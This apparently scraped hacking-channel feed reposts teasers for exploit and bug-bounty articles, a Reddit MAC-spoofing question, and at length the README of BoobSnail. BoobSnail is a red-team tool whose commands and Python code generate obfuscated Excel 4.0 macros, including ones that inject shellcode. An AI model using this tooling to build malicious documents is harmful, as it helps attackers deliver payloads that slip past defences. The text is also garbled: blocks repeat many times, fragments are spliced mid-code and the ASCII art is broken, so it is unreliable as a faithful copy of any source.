Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
CVE-2021–40444 — Metasploit Reverse Shell using a malicious .dll payload
Probably you already know about the CVE-2021–40444 (Microsoft Office Word Remote Code Execution). Attackers abused it to exploit and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
CVE-2021–40444 — Metasploit Reverse Shell using a malicious .dll payload
Probably you already know about the CVE-2021–40444 (Microsoft Office Word Remote Code Execution). Attackers abused it to exploit and…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CVE-2021–40444 — Metasploit Reverse Shell using a malicious .dll payload
Probably you already know about the CVE-2021–40444 (Microsoft Office Word Remote Code Execution). Attackers abused it to exploit and…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
OverTheWire Bandit walkthrough Lv 0
Hi people :) , I’m Anish.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
OverTheWire Bandit walkthrough Lv 0
Hi people :) , I’m Anish.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
OverTheWire Bandit walkthrough Lv 0
Hi people :) , I’m Anish.
Why is Bug bounty trending?
https://medium.com/@shivyanshi.shukla/why-is-bug-bounty-trending-af0d2c0780bf?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@shivyanshi.shukla/why-is-bug-bounty-trending-af0d2c0780bf?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Why is Bug bounty trending?
Bug bounty, a big name among cybersecurity analysts and tech giants, has gained tremendous fame over time. This article will help you know…
Bug bounty, a big name among cybersecurity analysts and tech giants, has gained tremendous fame over time. This article will help you know…Continue reading on Medium » (https://medium.com/@shivyanshi.shukla/why-is-bug-bounty-trending-af0d2c0780bf?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Why is Bug bounty trending?
Bug bounty, a big name among cybersecurity analysts and tech giants, has gained tremendous fame over time. This article will help you know…
This is why you shouldn’t trust your Federated Identity Provider
https://medium.com/@soufianehabti/this-is-why-you-shouldnt-trust-your-federated-identity-provider-62160f50d8b2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@soufianehabti/this-is-why-you-shouldnt-trust-your-federated-identity-provider-62160f50d8b2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
This is why you shouldn’t trust your Federated Identity Provider
Last year, while taking my daily dose of HackerOne’s Hacktivity, I stumbled upon this amazing writeup of cache-money where he demonstrated…
Last year, while taking my daily dose of HackerOne’s Hacktivity, I stumbled upon this amazing writeup of cache-money where he demonstrated…Continue reading on Medium » (https://medium.com/@soufianehabti/this-is-why-you-shouldnt-trust-your-federated-identity-provider-62160f50d8b2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
This is why you shouldn’t trust your Federated Identity Provider
Last year, while taking my daily dose of HackerOne’s Hacktivity, I stumbled upon this amazing writeup of cache-money where he demonstrated…
10 golden minutes for taking over a Chess.com account
https://infosecwriteups.com/10-golden-minutes-for-taking-over-a-chess-com-account-56e73f7c5f0d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://infosecwriteups.com/10-golden-minutes-for-taking-over-a-chess-com-account-56e73f7c5f0d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 golden minutes for taking over a Chess.com account
Hi folks, this is the second write-up about finding bugs on Chess.com. You can find the first one here. The Chess.com is most famous…
Hi folks, this is the second write-up about finding bugs on Chess.com. You can find the first one here.Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/10-golden-minutes-for-taking-over-a-chess-com-account-56e73f7c5f0d?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 golden minutes for taking over a Chess.com account
Hi folks, this is the second write-up about finding bugs on Chess.com. You can find the first one here. The Chess.com is most famous…
BoobSnail - Allows Generating Excel 4.0 XLM Macro
http://www.kitploit.com/2021/09/boobsnail-allows-generating-excel-40.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/09/boobsnail-allows-generating-excel-40.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
BoobSnail - Allows Generating Excel 4.0 XLM Macro
Building and Running
Tested on: Python 3.8.7rc1 | ) \_\ \/ \ | \/ __ \| | |__ |___ /\____/ \____/|___ /_______ /___| (____ /__|____/ \/ \/ \/ \/ \/ Author: @_mzer0 @stm_cyber (...) ">pip install -r requirements.txt
python boobsnail.py
___. ___. _________ .__.__
\_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| |
| __ \ / _ \ / _ \| __ \ \_____ \ / \__ \ | | |
| \_\ ( | ) \_\ \/ \ | \/ __ \| | |__
|___ /\____/ \____/|___ /_______ /___| (____ /__|____/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(...)
Generators usage
-h ">python boobsnail.py -h
To display available generators type: python boobsnail.py
Examples
Generate obfuscated macro that injects x64 or x86 shellcode: --inputx64 --out boobsnail.csv ">python boobsnail.py Excel4NtDonutGenerator --inputx86 --inputx64 --out boobsnail.csv
Generate obfuscated macro that runs calc.exe: python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv
Saving output in Excel
Dump output to CSV file. Copy content of CSV file. Run Excel and create a new worksheet. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro). Paste the content in cell A1 or R1C1. Click Data -> Text to Columns. Click Next -> Set Semicolon as separator and click Finish.
Library usage
BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator: excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables; excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro; excel4lib.lang.Excel4Translator - allows translating formulas to another language. The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc.exe";
=EXEC(cmd);
Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator (https://www.kitploit.com/search/label/Obfuscator) and pass it to the Excel4Macro object: from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) For now excel4lib shares two obfuscation classes: excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro; excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption (https://www.kitploit.com/search/label/Encryption) to obfusacte formulas. As you can see you can write your own obfuscator class and use it in Excel4Macro. Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
___________________________
@hacking_Attack
@Hacking_Video
Tested on: Python 3.8.7rc1 | ) \_\ \/ \ | \/ __ \| | |__ |___ /\____/ \____/|___ /_______ /___| (____ /__|____/ \/ \/ \/ \/ \/ Author: @_mzer0 @stm_cyber (...) ">pip install -r requirements.txt
python boobsnail.py
___. ___. _________ .__.__
\_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| |
| __ \ / _ \ / _ \| __ \ \_____ \ / \__ \ | | |
| \_\ ( | ) \_\ \/ \ | \/ __ \| | |__
|___ /\____/ \____/|___ /_______ /___| (____ /__|____/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(...)
Generators usage
-h ">python boobsnail.py -h
To display available generators type: python boobsnail.py
Examples
Generate obfuscated macro that injects x64 or x86 shellcode: --inputx64 --out boobsnail.csv ">python boobsnail.py Excel4NtDonutGenerator --inputx86 --inputx64 --out boobsnail.csv
Generate obfuscated macro that runs calc.exe: python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv
Saving output in Excel
Dump output to CSV file. Copy content of CSV file. Run Excel and create a new worksheet. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro). Paste the content in cell A1 or R1C1. Click Data -> Text to Columns. Click Next -> Set Semicolon as separator and click Finish.
Library usage
BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator: excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables; excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro; excel4lib.lang.Excel4Translator - allows translating formulas to another language. The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc.exe";
=EXEC(cmd);
Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator (https://www.kitploit.com/search/label/Obfuscator) and pass it to the Excel4Macro object: from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) For now excel4lib shares two obfuscation classes: excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro; excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption (https://www.kitploit.com/search/label/Encryption) to obfusacte formulas. As you can see you can write your own obfuscator class and use it in Excel4Macro. Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);
For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory. For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function. from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));
As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function. from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;
Author
mzer0 (https://twitter.com/_mzer0) from stm_cyber (https://twitter.com/stm_cyber) team!
Articles
The first step in Excel 4.0 for Red Team (https://blog.stmcyber.com/excel-4-0-for-red-team/) BoobSnail - Excel 4.0 macro generator (https://blog.stmcyber.com/boobsnail-excel-4-0-macro-generator/)
Download Boobsnail (https://github.com/STMSolutions/boobsnail)
___________________________
@hacking_Attack
@Hacking_Video
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);
For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory. For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function. from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));
As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function. from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv()) Result: cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;
Author
mzer0 (https://twitter.com/_mzer0) from stm_cyber (https://twitter.com/stm_cyber) team!
Articles
The first step in Excel 4.0 for Red Team (https://blog.stmcyber.com/excel-4-0-for-red-team/) BoobSnail - Excel 4.0 macro generator (https://blog.stmcyber.com/boobsnail-excel-4-0-macro-generator/)
Download Boobsnail (https://github.com/STMSolutions/boobsnail)
___________________________
@hacking_Attack
@Hacking_Video
Twitter
fromheroto... (@_mzer0) | Twitter
The latest Tweets from fromheroto... (@_mzer0)
hacking: security in practice
Unable to spoof my Mac Address from a previously connected network
Hi there,
So I've got stuck in a part of the process of spoofing my MAC address , it should be normally OK , but it seems that there is a factor that I'm not having into consideration here.
So I'm disconnecting my wireless device to give it a new mac address , to then connect it back again to the same network I was connected before.
That gives me a new MAC address , if I check this command I see a new address
Problem is when I connect to the network I was connected before (even deleting the network from nmcli) it will pop up the same old MAC address
``` nmcli dev wifi connect "MyAP"
```
Anyone knows what I'm doing wrong?
Thank you
submitted by /u/brohermano
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Unable to spoof my Mac Address from a previously connected network
Hi there,
So I've got stuck in a part of the process of spoofing my MAC address , it should be normally OK , but it seems that there is a factor that I'm not having into consideration here.
So I'm disconnecting my wireless device to give it a new mac address , to then connect it back again to the same network I was connected before.
sudo nmcli dev disconnect wlp1s0 interface=wlp1s0 sudo ifconfig $interface down macchanger -r $interface sudo ifconfig $interface up That gives me a new MAC address , if I check this command I see a new address
ip addr show dev wlp1s0 | grep ether | awk '{print $2}' Problem is when I connect to the network I was connected before (even deleting the network from nmcli) it will pop up the same old MAC address
``` nmcli dev wifi connect "MyAP"
```
Anyone knows what I'm doing wrong?
Thank you
submitted by /u/brohermano
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Unable to spoof my Mac Address from a previously connected network
Hi there, So I've got stuck in a part of the process of spoofing my MAC address , it should be normally OK , but it seems that there is a factor...